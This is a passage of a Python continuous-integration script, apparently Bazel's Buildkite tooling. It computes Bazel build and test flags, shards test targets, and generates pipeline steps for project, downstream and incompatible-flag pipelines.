[bazel_binary] + common_startup_flags(platform) + ["info", "output_base"],
print_output=False,
).strip()
aggregated_flags[i] = flag.replace("$OUTPUT_BASE", output_base)
return aggregated_flags
def execute_bazel_clean(bazel_binary, platform):
print_expanded_group(":bazel: Clean")
try:
execute_command([bazel_binary] + common_startup_flags(platform) + ["clean", "--expunge"])
except subprocess.CalledProcessError as e:
raise BuildkiteException("bazel clean failed with exit code {}".format(e.returncode))
def kythe_startup_flags():
return [f"--bazelrc={KYTHE_DIR}/extractors.bazelrc"]
def kythe_build_flags():
return [
"--experimental_convenience_symlinks=normal",
f"--override_repository=kythe_release={KYTHE_DIR}",
]
def execute_bazel_build(
bazel_version, bazel_binary, platform, flags, targets, bep_file, incompatible_flags
):
print_collapsed_group(":bazel: Computing flags for build step")
aggregated_flags = compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=True,
)
print_expanded_group(":bazel: Build ({})".format(bazel_version))
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["build"]
+ aggregated_flags
+ ["--"]
+ targets
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "build")
def execute_bazel_build_with_kythe(
bazel_version, bazel_binary, platform, flags, targets, bep_file, incompatible_flags
):
print_collapsed_group(":bazel: Computing flags for build step")
aggregated_flags = compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=False,
)
print_expanded_group(":bazel: Build ({})".format(bazel_version))
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ kythe_startup_flags()
+ ["build"]
+ kythe_build_flags()
+ aggregated_flags
+ ["--"]
+ targets
)
def calculate_targets(task_config, platform, bazel_binary, build_only, test_only):
build_targets = [] if test_only else task_config.get("build_targets", [])
test_targets = [] if build_only else task_config.get("test_targets", [])
index_targets = [] if (build_only or test_only) else task_config.get("index_targets", [])
index_targets_query = (
None if (build_only or test_only) else task_config.get("index_targets_query", None)
)
if index_targets_query:
output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "query", index_targets_query],
print_output=False,
)
index_targets += output.strip().split("\n")
# Remove the "--" argument splitter from the list that some configs explicitly
# include. We'll add it back again later where needed.
build_targets = [x.strip() for x in build_targets if x.strip() != "--"]
test_targets = [x.strip() for x in test_targets if x.strip() != "--"]
index_targets = [x.strip() for x in index_targets if x.strip() != "--"]
shard_id = int(os.getenv("BUILDKITE_PARALLEL_JOB", "-1"))
shard_count = int(os.getenv("BUILDKITE_PARALLEL_JOB_COUNT", "-1"))
if shard_id > -1 and shard_count > -1:
print_collapsed_group(
":female-detective: Calculating targets for shard {}/{}".format(
shard_id + 1, shard_count
)
)
expanded_test_targets = expand_test_target_patterns(bazel_binary, platform, test_targets)
test_targets = get_targets_for_shard(expanded_test_targets, shard_id, shard_count)
return build_targets, test_targets, index_targets
def expand_test_target_patterns(bazel_binary, platform, test_targets):
included_targets, excluded_targets = partition_targets(test_targets)
excluded_string = (
" except tests(set({}))".format(" ".join("'{}'".format(t) for t in excluded_targets))
if excluded_targets
else ""
)
exclude_manual = ' except tests(attr("tags", "manual", set({})))'.format(
" ".join("'{}'".format(t) for t in included_targets)
)
eprint("Resolving test targets via bazel query")
output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ [
"--nomaster_bazelrc",
"--bazelrc=/dev/null",
"query",
"tests(set({})){}{}".format(
" ".join("'{}'".format(t) for t in included_targets),
excluded_string,
exclude_manual,
),
],
print_output=False,
).strip()
return output.split("\n") if output else []
def partition_targets(targets):
included_targets, excluded_targets = [], []
for target in targets:
if target.startswith("-"):
excluded_targets.append(target[1:])
else:
included_targets.append(target)
return included_targets, excluded_targets
def get_targets_for_shard(test_targets, shard_id, shard_count):
# TODO(fweikert): implement a more sophisticated algorithm
return sorted(test_targets)[shard_id::shard_count]
def execute_bazel_test(
bazel_version,
bazel_binary,
platform,
flags,
targets,
bep_file,
monitor_flaky_tests,
incompatible_flags,
):
aggregated_flags = [
"--flaky_test_attempts=3",
"--build_tests_only",
"--local_test_jobs=" + concurrent_test_jobs(platform),
]
# Don't enable remote caching if the user enabled remote execution / caching themselves
# or flaky test monitoring is enabled, as remote caching makes tests look less flaky than
# they are.
print_collapsed_group(":bazel: Computing flags for test step")
aggregated_flags += compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=not monitor_flaky_tests,
)
print_expanded_group(":bazel: Test ({})".format(bazel_version))
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["test"]
+ aggregated_flags
+ ["--"]
+ targets
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "test")
def upload_test_logs_from_bep(bep_file, tmpdir, binary_platform, monitor_flaky_tests):
bazelci_agent_binary = download_bazelci_agent(tmpdir, binary_platform, "0.1.3")
execute_command(
[bazelci_agent_binary, "artifact", "upload", "--delay=5", "--mode=buildkite", "--build_event_json_file={}".format(bep_file)]
+ (["--monitor_flaky_tests"] if monitor_flaky_tests else [])
)
def upload_json_profile(json_profile_path, tmpdir):
if not os.path.exists(json_profile_path):
return
print_collapsed_group(":gcloud: Uploading JSON Profile")
execute_command(["buildkite-agent", "artifact", "upload", json_profile_path], cwd=tmpdir)
def upload_corrupted_outputs(capture_corrupted_outputs_dir, tmpdir):
if not os.path.exists(capture_corrupted_outputs_dir):
return
print_collapsed_group(":gcloud: Uploading corrupted outputs")
execute_command(
["buildkite-agent", "artifact", "upload", "{}/**/*".format(capture_corrupted_outputs_dir)],
cwd=tmpdir,
)
def execute_command_and_get_output(args, shell=False, fail_if_nonzero=True, print_output=True):
eprint(" ".join(args))
process = subprocess.run(
args,
shell=shell,
check=fail_if_nonzero,
env=os.environ,
stdout=subprocess.PIPE,
errors="replace",
universal_newlines=True,
)
if print_output:
eprint(process.stdout)
return process.stdout
def execute_command(args, shell=False, fail_if_nonzero=True, cwd=None, print_output=True):
if print_output:
eprint(" ".join(args))
return subprocess.run(
args, shell=shell, check=fail_if_nonzero, env=os.environ, cwd=cwd
).returncode
def execute_command_background(args):
eprint(" ".join(args))
return subprocess.Popen(args, env=os.environ)
def terminate_background_process(process):
if process:
process.terminate()
try:
process.wait(timeout=10)
except subprocess.TimeoutExpired:
process.kill()
def create_step(label, commands, platform, shards=1, soft_fail=None):
if "docker-image" in PLATFORMS[platform]:
step = create_docker_step(
label, image=PLATFORMS[platform]["docker-image"], commands=commands
)
else:
step = {
"label": label,
"command": commands,
"agents": {"queue": PLATFORMS[platform]["queue"]},
}
if shards > 1:
step["label"] += " (shard %n)"
step["parallelism"] = shards
if soft_fail is not None:
step["soft_fail"] = soft_fail
# Enforce a global 8 hour job timeout.
step["timeout_in_minutes"] = 8 * 60
# Automatically retry when an agent got lost (usually due to an infra flake).
step["retry"] = {
"automatic": [
{"exit_status": -1, "limit": 3}, # Buildkite internal "agent lost" exit code
{"exit_status": 137, "limit": 3}, # SIGKILL
{"exit_status": 143, "limit": 3}, # SIGTERM
]
}
return step
def create_docker_step(label, image, commands=None, additional_env_vars=None):
env = ["ANDROID_HOME", "ANDROID_NDK_HOME", "BUILDKITE_ARTIFACT_UPLOAD_DESTINATION"]
if additional_env_vars:
env += ["{}={}".format(k, v) for k, v in additional_env_vars.items()]
step = {
"label": label,
"command": commands,
"agents": {"queue": "default"},
"plugins": {
"docker#v3.8.0": {
"always-pull": True,
"environment": env,
"image": image,
"network": "host",
"privileged": True,
"propagate-environment": True,
"propagate-uid-gid": True,
"volumes": [
"/etc/group:/etc/group:ro",
"/etc/passwd:/etc/passwd:ro",
"/etc/shadow:/etc/shadow:ro",
"/opt/android-ndk-r15c:/opt/android-ndk-r15c:ro",
"/opt/android-sdk-linux:/opt/android-sdk-linux:ro",
"/var/lib/buildkite-agent:/var/lib/buildkite-agent",
"/var/lib/gitmirrors:/var/lib/gitmirrors:ro",
"/var/run/docker.sock:/var/run/docker.sock",
],
}
},
}
if not step["command"]:
del step["command"]
return step
def print_project_pipeline(
configs,
project_name,
http_config,
file_config,
git_repository,
monitor_flaky_tests,
use_but,
incompatible_flags,
notify,
):
task_configs = configs.get("tasks", None)
if not task_configs:
raise BuildkiteException("{0} pipeline configuration is empty.".format(project_name))
pipeline_steps = []
# If the repository is hosted on Git-on-borg, we show the link to the commit Gerrit review
buildkite_repo = os.getenv("BUILDKITE_REPO")
if is_git_on_borg_repo(buildkite_repo):
show_gerrit_review_link(buildkite_repo, pipeline_steps)
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
# In Bazel Downstream Project pipelines, git_repository and project_name must be specified.
is_downstream_project = (use_but or incompatible_flags) and git_repository and project_name
buildifier_config = configs.get("buildifier")
# Skip Buildifier when we test downstream projects.
if buildifier_config and not is_downstream_project:
buildifier_env_vars = {}
if isinstance(buildifier_config, str):
# Simple format:
# ---
# buildifier: latest
buildifier_env_vars["BUILDIFIER_VERSION"] = buildifier_config
else:
# Advanced format:
# ---
# buildifier:
# version: latest
# warnings: all
if "version" in buildifier_config:
buildifier_env_vars["BUILDIFIER_VERSION"] = buildifier_config["version"]
if "warnings" in buildifier_config:
buildifier_env_vars["BUILDIFIER_WARNINGS"] = buildifier_config["warnings"]
if not buildifier_env_vars:
raise BuildkiteException(
'Invalid buildifier configuration entry "{}"'.format(buildifier_config)
)
pipeline_steps.append(
create_docker_step(
BUILDIFIER_STEP_NAME,
image=BUILDIFIER_DOCKER_IMAGE,
additional_env_vars=buildifier_env_vars,
)
)
# In Bazel Downstream Project pipelines, we should test the project at the last green commit.
git_commit = None
if is_downstream_project:
last_green_commit_url = bazelci_last_green_commit_url(
git_repository, DOWNSTREAM_PROJECTS[project_name]["pipeline_slug"]
)
git_commit = get_last_green_commit(last_green_commit_url)
config_hashes = set()
skipped_due_to_bazel_version = []
for task, task_config in task_configs.items():
platform = get_platform_for_task(task, task_config)
task_name = task_config.get("name")
soft_fail = task_config.get("soft_fail")
# We override the Bazel version in downstream pipelines. This means that two tasks that
# only differ in the value of their explicit "bazel" field will be identical in the
# downstream pipeline, thus leading to duplicate work.
# Consequently, we filter those duplicate tasks here.
if is_downstream_project:
# Skip tasks that require a specific Bazel version
bazel = task_config.get("bazel")
if bazel and bazel != "latest":
skipped_due_to_bazel_version.append(
"{}: '{}'".format(
create_label(platform, project_name, task_name=task_name), bazel
)
)
continue
h = hash_task_config(task, task_config)
if h in config_hashes:
continue
config_hashes.add(h)
shards = task_config.get("shards", "1")
try:
shards = int(shards)
except ValueError:
raise BuildkiteException("Task {} has invalid shard value '{}'".format(task, shards))
step = runner_step(
platform=platform,
task=task,
task_name=task_name,
project_name=project_name,
http_config=http_config,
file_config=file_config,
git_repository=git_repository,
git_commit=git_commit,
monitor_flaky_tests=monitor_flaky_tests,
use_but=use_but,
incompatible_flags=incompatible_flags,
shards=shards,
soft_fail=soft_fail,
)
pipeline_steps.append(step)
if skipped_due_to_bazel_version:
lines = ["\n- {}".format(s) for s in skipped_due_to_bazel_version]
commands = [
"buildkite-agent annotate --style=info '{}' --append --context 'ctx-skipped_due_to_bazel_version'".format(
"".join(lines)
),
"buildkite-agent meta-data set 'has-skipped-steps' 'true'",
]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about skipped tasks due to different Bazel versions",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
pipeline_slug = os.getenv("BUILDKITE_PIPELINE_SLUG")
all_downstream_pipeline_slugs = []
for _, config in DOWNSTREAM_PROJECTS.items():
all_downstream_pipeline_slugs.append(config["pipeline_slug"])
# We update last green commit in the following cases:
# 1. This job runs on master, stable or main branch (could be a custom build launched manually)
# 2. We intend to run the same job in downstream with Bazel@HEAD (eg. google-bazel-presubmit)
# 3. This job is not:
# - a GitHub pull request
# - uses a custom built Bazel binary (in Bazel Downstream Projects pipeline)
# - testing incompatible flags
# - running `bazelisk --migrate` in a non-downstream pipeline
if (
current_branch_is_main_branch()
and pipeline_slug in all_downstream_pipeline_slugs
and not (is_pull_request() or use_but or incompatible_flags or use_bazelisk_migrate())
):
# We need to call "Try Update Last Green Commit" even if there are failures,
# since we don't want a failing Buildifier step to block the update of
# the last green commit for this project.
# try_update_last_green_commit() ensures that we don't update the commit
# if any build or test steps fail.
pipeline_steps.append({"wait": None, "continue_on_failure": True})
pipeline_steps.append(
create_step(
label="Try Update Last Green Commit",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " bazelci.py try_update_last_green_commit",
],
platform=DEFAULT_PLATFORM,
)
)
if "validate_config" in configs:
pipeline_steps += create_config_validation_steps()
if use_bazelisk_migrate() and not is_downstream_project:
# Print results of bazelisk --migrate in project pipelines that explicitly set
# the USE_BAZELISK_MIGRATE env var, but that are not being run as part of a
# downstream pipeline.
number = os.getenv("BUILDKITE_BUILD_NUMBER")
pipeline_steps += get_steps_for_aggregating_migration_results(number, notify)
print_pipeline_steps(pipeline_steps, handle_emergencies=not is_downstream_project)
def show_gerrit_review_link(git_repository, pipeline_steps):
host = re.search(r"https://(.+?)\.googlesource", git_repository).group(1)
if not host:
raise BuildkiteException("Couldn't get host name from %s" % git_repository)
text = "The transformed code used in this pipeline can be found under https://{}-review.googlesource.com/q/{}".format(
host, os.getenv("BUILDKITE_COMMIT")
)
commands = ["buildkite-agent annotate --style=info '{}'".format(text)]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about Gerrit Review Link",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
def is_git_on_borg_repo(git_repository):
return git_repository and "googlesource.com" in git_repository
def hash_task_config(task_name, task_config):
# Two task configs c1 and c2 have the same hash iff they lead to two functionally identical jobs
# in the downstream pipeline. This function discards the "bazel" field (since it's being
# overridden) and the "name" field (since it has no effect on the actual work).
# Moreover, it adds an explicit "platform" field if that's missing.
cpy = task_config.copy()
cpy.pop("bazel", None)
cpy.pop("name", None)
if "platform" not in cpy:
cpy["platform"] = task_name
m = hashlib.md5()
for key in sorted(cpy):
value = "%s:%s;" % (key, cpy[key])
m.update(value.encode("utf-8"))
return m.digest()
def get_platform_for_task(task, task_config):
# Most pipeline configurations have exactly one task per platform, which makes it
# convenient to use the platform name as task ID. Consequently, we use the
# task ID as platform if there is no explicit "platform" field.
return task_config.get("platform", task)
def create_config_validation_steps():
output = execute_command_and_get_output(
["git", "diff-tree", "--no-commit-id", "--name-only", "-r", os.getenv("BUILDKITE_COMMIT")]
)
config_files = [
path
for path in output.split("\n")
if path.startswith(".bazelci/") and os.path.splitext(path)[1] in CONFIG_FILE_EXTENSIONS
]
return [
create_step(
label=":cop: Validate {}".format(f),
commands=[
fetch_bazelcipy_command(),
"{} bazelci.py project_pipeline --file_config={}".format(
PLATFORMS[DEFAULT_PLATFORM]["python"], f
),
],
platform=DEFAULT_PLATFORM,
)
for f in config_files
]
def print_pipeline_steps(pipeline_steps, handle_emergencies=True):
if handle_emergencies:
emergency_step = create_emergency_announcement_step_if_necessary()
if emergency_step:
pipeline_steps.insert(0, emergency_step)
print(yaml.dump({"steps": pipeline_steps}))
def create_emergency_announcement_step_if_necessary():
style = "error"
message, issue_url, last_good_bazel = None, None, None
try:
emergency_settings = load_remote_yaml_file(EMERGENCY_FILE_URL)
message = emergency_settings.get("message")
issue_url = emergency_settings.get("issue_url")
last_good_bazel = emergency_settings.get("last_good_bazel")
except urllib.error.HTTPError as ex:
message = str(ex)
style = "warning"
if not any([message, issue_url, last_good_bazel]):
return
text = '<span class="h1">:rotating_light: Emergency :rotating_light:</span>\n'
if message:
text += "- {}\n".format(message)
if issue_url:
text += '- Please check this <a href="{}">issue</a> for more details.\n'.format(issue_url)
if last_good_bazel:
text += (
"- Default Bazel version is *{}*, "
"unless the pipeline configuration specifies an explicit version."
).format(last_good_bazel)
return create_step(
label=":rotating_light: Emergency :rotating_light:",
commands=[
'buildkite-agent annotate --append --style={} --context "omg" "{}"'.format(style, text)
],
platform=DEFAULT_PLATFORM,
)
def runner_step(
platform,
task,
task_name=None,
project_name=None,
http_config=None,
file_config=None,
git_repository=None,
git_commit=None,
monitor_flaky_tests=False,
use_but=False,
incompatible_flags=None,
shards=1,
soft_fail=None,
):
command = PLATFORMS[platform]["python"] + " bazelci.py runner --task=" + task
if http_config:
command += " --http_config=" + http_config
if file_config:
command += " --file_config=" + file_config
if git_repository:
command += " --git_repository=" + git_repository
if git_commit:
command += " --git_commit=" + git_commit
if monitor_flaky_tests:
command += " --monitor_flaky_tests"
if use_but:
command += " --use_but"
for flag in incompatible_flags or []:
command += " --incompatible_flag=" + flag
label = create_label(platform, project_name, task_name=task_name)
return create_step(
label=label,
commands=[fetch_bazelcipy_command(), command],
platform=platform,
shards=shards,
soft_fail=soft_fail,
)
def fetch_bazelcipy_command():
return "curl -sS {0} -o bazelci.py".format(SCRIPT_URL)
def fetch_incompatible_flag_verbose_failures_command():
return "curl -sS {0} -o incompatible_flag_verbose_failures.py".format(
INCOMPATIBLE_FLAG_VERBOSE_FAILURES_URL
)
def fetch_aggregate_incompatible_flags_test_result_command():
return "curl -sS {0} -o aggregate_incompatible_flags_test_result.py".format(
AGGREGATE_INCOMPATIBLE_TEST_RESULT_URL
)
def upload_project_pipeline_step(
project_name, git_repository, http_config, file_config, incompatible_flags
):
pipeline_command = (
'{0} bazelci.py project_pipeline --project_name="{1}" ' + "--git_repository={2}"
).format(PLATFORMS[DEFAULT_PLATFORM]["python"], project_name, git_repository)
if incompatible_flags is None:
pipeline_command += " --use_but"
else:
for flag in incompatible_flags:
pipeline_command += " --incompatible_flag=" + flag
if http_config:
pipeline_command += " --http_config=" + http_config
if file_config:
pipeline_command += " --file_config=" + file_config
pipeline_command += " | buildkite-agent pipeline upload"
return create_step(
label="Setup {0}".format(project_name),
commands=[fetch_bazelcipy_command(), pipeline_command],
platform=DEFAULT_PLATFORM,
)
def create_label(platform, project_name, build_only=False, test_only=False, task_name=None):
if build_only and test_only:
raise BuildkiteException("build_only and test_only cannot be true at the same time")
platform_display_name = PLATFORMS[platform]["emoji-name"]
if build_only:
label = "Build "
elif test_only:
label = "Test "
else:
label = ""
platform_label = (
"{0} on {1}".format(task_name, platform_display_name)
if task_name
else platform_display_name
)
if project_name:
label += "{0} ({1})".format(project_name, platform_label)
else:
label += platform_label
return label
def bazel_build_step(
task,
platform,
project_name,
http_config=None,
file_config=None,
build_only=False,
test_only=False,
):
pipeline_command = PLATFORMS[platform]["python"] + " bazelci.py runner"
if build_only:
pipeline_command += " --build_only --save_but"
if test_only:
pipeline_command += " --test_only"
if http_config:
pipeline_command += " --http_config=" + http_config
if file_config:
pipeline_command += " --file_config=" + file_config
pipeline_command += " --task=" + task
return create_step(
label=create_label(platform, project_name, build_only, test_only),
commands=[fetch_bazelcipy_command(), pipeline_command],
platform=platform,
)
def filter_tasks_that_should_be_skipped(task_configs, pipeline_steps):
skip_tasks = get_skip_tasks()
if not skip_tasks:
return task_configs
actually_skipped = []
skip_tasks = set(skip_tasks)
for task in list(task_configs.keys()):
if task in skip_tasks:
actually_skipped.append(task)
del task_configs[task]
skip_tasks.remove(task)
if not task_configs:
raise BuildkiteException(
"Nothing to do since all tasks in the configuration should be skipped."
)
annotations = []
if actually_skipped:
annotations.append(
("info", "Skipping the following task(s): {}".format(", ".join(actually_skipped)))
)
if skip_tasks:
annotations.append(
(
"warning",
(
"The following tasks should have been skipped, "
"but were not part of the configuration: {}"
).format(", ".join(skip_tasks)),
)
)
if annotations:
print_skip_task_annotations(annotations, pipeline_steps)
return task_configs
def get_skip_tasks():
value = os.getenv(SKIP_TASKS_ENV_VAR, "")
return [v for v in value.split(",") if v]
def print_skip_task_annotations(annotations, pipeline_steps):
commands = [
"buildkite-agent annotate --style={} '{}' --context 'ctx-{}'".format(s, t, hash(t))
for s, t in annotations
]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about skipped tasks",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
def print_bazel_publish_binaries_pipeline(task_configs, http_config, file_config):
if not task_configs:
raise BuildkiteException("Bazel publish binaries pipeline configuration is empty.")
pipeline_steps = []
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
platforms = [get_platform_for_task(t, tc) for t, tc in task_configs.items()]
# These are the platforms that the bazel_publish_binaries.yml config is actually building.
configured_platforms = set(filter(should_publish_binaries_for_platform, platforms))
# These are the platforms that we want to build and publish according to this script.
expected_platforms = set(filter(should_publish_binaries_for_platform, PLATFORMS))
# We can skip this check if we're not on the main branch, because then we're probably
# building a one-off custom debugging binary anyway.
if current_branch_is_main_branch() and not expected_platforms.issubset(configured_platforms):
raise BuildkiteException(
"Bazel publish binaries pipeline needs to build Bazel for every commit on all publish_binary-enabled platforms."
)
# Build Bazel
for task, task_config in task_configs.items():
pipeline_steps.append(
bazel_build_step(
task,
get_platform_for_task(task, task_config),
"Bazel",
http_config,
file_config,
build_only=True,
)
)
pipeline_steps.append("wait")
# If all builds succeed, publish the Bazel binaries to GCS.
pipeline_steps.append(
create_step(
label="Publish Bazel Binaries",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"] + " bazelci.py publish_binaries",
],
platform=DEFAULT_PLATFORM,
)
)
print_pipeline_steps(pipeline_steps)
def should_publish_binaries_for_platform(platform):
if platform not in PLATFORMS:
raise BuildkiteException("Unknown platform '{}'".format(platform))
return PLATFORMS[platform]["publish_binary"]
def print_disabled_projects_info_box_step():
info_text = ["Downstream testing is disabled for the following projects :sadpanda:"]
for project, config in DOWNSTREAM_PROJECTS.items():
disabled_reason = config.get("disabled_reason", None)
if disabled_reason:
info_text.append("* **%s**: %s" % (project, disabled_reason))
if len(info_text) == 1:
return None
return create_step(
label=":sadpanda:",
commands=[
'buildkite-agent annotate --append --style=info "\n' + "\n".join(info_text) + '\n"'
],
platform=DEFAULT_PLATFORM,
)
def print_incompatible_flags_info_box_step(incompatible_flags_map):
info_text = ["Build and test with the following incompatible flags:"]
for flag in incompatible_flags_map:
info_text.append("* **%s**: %s" % (flag, incompatible_flags_map[flag]))
if len(info_text) == 1:
return None
return create_step(
label="Incompatible flags info",
commands=[
'buildkite-agent annotate --append --style=info "\n' + "\n".join(info_text) + '\n"'
],
platform=DEFAULT_PLATFORM,
)
def fetch_incompatible_flags():
"""
Return a list of incompatible flags to be tested in downstream with the current release Bazel
"""
incompatible_flags = {}
# If INCOMPATIBLE_FLAGS environment variable is set, we get incompatible flags from it.
if "INCOMPATIBLE_FLAGS" in os.environ:
for flag in os.environ["INCOMPATIBLE_FLAGS"].split():
# We are not able to get the github link for this flag from INCOMPATIBLE_FLAGS,
# so just assign the url to empty string.
incompatible_flags[flag] = ""
return incompatible_flags
output = subprocess.check_output(
[
"curl",
"https://api.github.com/search/issues?per_page=100&q=repo:bazelbuild/bazel+label:incompatible-change+state:open"
]
).decode("utf-8")
issue_info = json.loads(output)
for issue in issue_info["items"]:
# Every incompatible flags issue should start with "<incompatible flag name (without --)>:"
name = "--" + issue["title"].split(":")[0]
url = issue["html_url"]
if name.startswith("--incompatible_"):
incompatible_flags[name] = url
else:
eprint(
f"{name} is not recognized as an incompatible flag, please modify the issue title "
f'of {url} to "<incompatible flag name (without --)>:..."'
)
return incompatible_flags
def print_bazel_downstream_pipeline(
task_configs, http_config, file_config, test_incompatible_flags, test_disabled_projects, notify
):
if not task_configs:
raise BuildkiteException("Bazel downstream pipeline configuration is empty.")
pipeline_steps = []
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
pipeline_steps = []
info_box_step = print_disabled_projects_info_box_step()
if info_box_step is not None:
pipeline_steps.append(info_box_step)
if not test_incompatible_flags:
for task, task_config in task_configs.items():
pipeline_steps.append(
bazel_build_step(
task,
get_platform_for_task(task, task_config),
"Bazel",
http_config,
file_config,
build_only=True,
)
)
pipeline_steps.append("wait")
incompatible_flags = None
if test_incompatible_flags:
incompatible_flags_map = fetch_incompatible_flags()
if not incompatible_flags_map:
step = create_step(
label="No Incompatible flags info",
commands=[
'buildkite-agent annotate --style=error "No incompatible flag issue is found on github for current version of Bazel." --context "noinc"'
],
platform=DEFAULT_PLATFORM,
)
pipeline_steps.append(step)
print_pipeline_steps(pipeline_steps)
return
info_box_step = print_incompatible_flags_info_box_step(incompatible_flags_map)
if info_box_step is not None:
pipeline_steps.append(info_box_step)
incompatible_flags = list(incompatible_flags_map.keys())
pipeline_steps.append(create_step(
label="Print skipped tasks annotation",
commands=['buildkite-agent annotate --style=info "The following tasks were skipped since they require specific Bazel versions:\n" --context "ctx-skipped_due_to_bazel_version"'],
platform=DEFAULT_PLATFORM))
for project, config in DOWNSTREAM_PROJECTS.items():
disabled_reason = config.get("disabled_reason", None)
# If test_disabled_projects is true, we add configs for disabled projects.
# If test_disabled_projects is false, we add configs for not disabled projects.
if (test_disabled_projects and disabled_reason) or (
not test_disabled_projects and not disabled_reason
):
pipeline_steps.append(
upload_project_pipeline_step(
project_name=project,
git_repository=config["git_repository"],
http_config=config.get("http_config", None),
file_config=config.get("file_config", None),
incompatible_flags=incompatible_flags,
)
)
pipeline_steps.append(create_step(
label="Remove skipped tasks annotation if unneeded",
commands=['buildkite-agent meta-data exists "has-skipped-steps" || buildkite-agent annotation remove --context "ctx-skipped_due_to_bazel_version"'],
platform=DEFAULT_PLATFORM))
if test_incompatible_flags:
current_build_number = os.environ.get("BUILDKITE_BUILD_NUMBER", None)
if not current_build_number:
raise BuildkiteException("Not running inside Buildkite")
if use_bazelisk_migrate():
pipeline_steps += get_steps_for_aggregating_migration_results(
current_build_number, notify
)
else:
pipeline_steps.append({"wait": "~", "continue_on_failure": "true"})
pipeline_steps.append(
create_step(
label="Test failing jobs with incompatible flag separately",
commands=[
fetch_bazelcipy_command(),
fetch_incompatible_flag_verbose_failures_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " incompatible_flag_verbose_failures.py --build_number=%s | buildkite-agent pipeline upload"
% current_build_number,
],
platform=DEFAULT_PLATFORM,
)
)
if (
not test_disabled_projects
and not test_incompatible_flags
and current_branch_is_main_branch()
):
# Only update the last green downstream commit in the regular Bazel@HEAD + Downstream pipeline.
pipeline_steps.append("wait")
pipeline_steps.append(
create_step(
label="Try Update Last Green Downstream Commit",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " bazelci.py try_update_last_green_downstream_commit",
],
platform=DEFAULT_PLATFORM,
)
)
print_pipeline_steps(pipeline_steps)
def get_steps_for_aggregating_migration_results(current_build_number, notify):
parts = [
PLATFORMS[DEFAULT_PLATFORM]["python"],
"aggregate_incompatible_flags_test_result.py",
"--build_number=%s" % current_build_number,
]
if notify:
parts.append("--notify")
return [
{"wait": "~", "continue_on_failure": "true"},
create_step(
label="Aggregate incompatible flags test result",
commands=[
fetch_bazelcipy_command(),
fetch_aggregate_incompatible_flags_test_result_command(),
" ".join(parts),
],
platform=DEFAULT_PLATFORM,
),
]
def bazelci_builds_download_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "https://storage.googleapis.com/{}/artifacts/{}/{}/bazel".format(
bucket_name, platform, git_commit
)
def bazelci_builds_nojdk_download_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "https://storage.googleapis.com/{}/artifacts/{}/{}/bazel_nojdk".format(
bucket_name, platform, git_commit
)
def bazelci_builds_gs_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/artifacts/{}/{}/bazel".format(bucket_name, platform, git_commit)
def bazelci_builds_nojdk_gs_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/artifacts/{}/{}/bazel_nojdk".format(bucket_name, platform, git_commit)
def bazelci_latest_build_metadata_url():
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/metadata/latest.json".format(bucket_name)
def bazelci_builds_metadata_url(git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/metadata/{}.json".format(bucket_name, git_commit)
def bazelci_last_green_commit_url(git_repository, pipeline_slug):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-untrusted-builds"
return "gs://{}/last_green_commit/{}/{}".format(
bucket_name, git_repository[len("https://") :], pipeline_slug
)
def bazelci_last_green_downstream_commit_url():
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-untrusted-builds"
return "gs://{}/last_green_commit/downstream_pipeline".format(bucket_name)
def get_last_green_commit(last_green_commit_url):
try:
return (
subprocess.check_output(
[gsutil_command(), "cat", last_green_commit_url], env=os.environ
)
.decode("utf-8")
.strip()
)
except subprocess.CalledProcessError:
return None
def try_update_last_green_commit():
org_slug = os.getenv("BUILDKITE_ORGANIZATION_SLUG")
pipeline_slug = os.getenv("BUILDKITE_PIPELINE_SLUG")
build_number = os.getenv("BUILDKITE_BUILD_NUMBER")
current_job_id = os.getenv("BUILDKITE_JOB_ID")
client = BuildkiteClient(org=org_slug, pipeline=pipeline_slug)
